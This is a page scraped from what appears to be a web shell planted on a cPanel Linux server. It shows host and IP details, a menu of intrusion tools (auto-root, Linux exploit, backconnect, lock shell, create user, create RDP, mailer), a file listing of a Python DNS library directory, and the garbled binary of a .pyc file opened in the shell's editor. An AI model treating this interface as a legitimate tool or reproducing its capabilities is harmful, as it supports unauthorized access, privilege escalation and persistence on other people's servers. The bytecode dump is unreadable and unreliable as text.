Linux cpanel.rrshost.in 5.15.0-25-generic #25-Ubuntu SMP Wed Mar 30 15:54:22 UTC 2022 x86_64
Apache
: 109.123.238.221 | : 108.162.216.177
128 Domain
8.2.28
aev999
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
local /
lib /
python2.7 /
dist-packages /
dns /
[ HOME SHELL ]
Name
Size
Permission
Action
__init__.pyc
769
B
-rw-r--r--
edns.pyc
5.27
KB
-rw-r--r--
entropy.pyc
3.74
KB
-rw-r--r--
exception.pyc
1.59
KB
-rw-r--r--
flags.pyc
2.61
KB
-rw-r--r--
hash.pyc
2.14
KB
-rw-r--r--
inet.pyc
2.63
KB
-rw-r--r--
ipv4.pyc
1.38
KB
-rw-r--r--
ipv6.pyc
3.45
KB
-rw-r--r--
message.pyc
36.56
KB
-rw-r--r--
name.pyc
23.2
KB
-rw-r--r--
opcode.pyc
2.52
KB
-rw-r--r--
query.pyc
15.38
KB
-rw-r--r--
rcode.pyc
2.94
KB
-rw-r--r--
rdata.pyc
16.74
KB
-rw-r--r--
rdataclass.pyc
2.97
KB
-rw-r--r--
rdataset.pyc
11.16
KB
-rw-r--r--
rdatatype.pyc
5.31
KB
-rw-r--r--
renderer.pyc
10.9
KB
-rw-r--r--
resolver.pyc
37.4
KB
-rw-r--r--
reversename.pyc
2.41
KB
-rw-r--r--
rrset.pyc
6.22
KB
-rw-r--r--
set.pyc
9.95
KB
-rw-r--r--
tokenizer.pyc
17.07
KB
-rw-r--r--
tsig.pyc
8.14
KB
-rw-r--r--
ttl.pyc
1.49
KB
-rw-r--r--
wiredata.pyc
2.23
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : rdataset.pyc
� ҥ�Oc @ s� d Z d d l Z d d l Z d d l Z d d l Z d d l Z d d l Z d d l Z d d l Z e j j Z d e j j f d � � YZ d e j j f d � � YZ d e j j f d � � YZ d � Z d � Z d � Z d � Z d S( sH DNS rdatasets (an rdataset is a set of rdatas of a given type and class)i����Nt DifferingCoversc B s e Z d Z RS( s� Raised if an attempt is made to add a SIG/RRSIG whose covered type is not the same as that of the other rdatas in the rdataset.( t __name__t __module__t __doc__( ( ( s6 /usr/local/lib/python2.7/dist-packages/dns/rdataset.pyR s t IncompatibleTypesc B s e Z d Z RS( sB Raised if an attempt is made to add rdata of an incompatible type.( R R R ( ( ( s6 /usr/local/lib/python2.7/dist-packages/dns/rdataset.pyR $ s t Rdatasetc B s� e Z d Z d d d d g Z e j j d � Z d � Z d � Z d d � Z d � Z d � Z d � Z d � Z d � Z d � Z d � Z d d e d d � Z d d d e d � Z d � Z RS( s� A DNS rdataset. @ivar rdclass: The class of the rdataset @type rdclass: int @ivar rdtype: The type of the rdataset @type rdtype: int @ivar covers: The covered type. Usually this value is dns.rdatatype.NONE, but if the rdtype is dns.rdatatype.SIG or dns.rdatatype.RRSIG, then the covers value will be the rdata type the SIG/RRSIG covers. The library treats the SIG and RRSIG types as if they were a family of types, e.g. RRSIG(A), RRSIG(NS), RRSIG(SOA). This makes RRSIGs much easier to work with than if RRSIGs covering different rdata types were aggregated into a single RRSIG rdataset. @type covers: int @ivar ttl: The DNS TTL (Time To Live) value @type ttl: int t rdclasst rdtypet coverst ttlc C s; t t | � j � | | _ | | _ | | _ d | _ d S( s� Create a new rdataset of the specified class and type. @see: the description of the class instance variables for the meaning of I{rdclass} and I{rdtype}i N( t superR t __init__R R R R ( t selfR R R ( ( s6 /usr/local/lib/python2.7/dist-packages/dns/rdataset.pyR >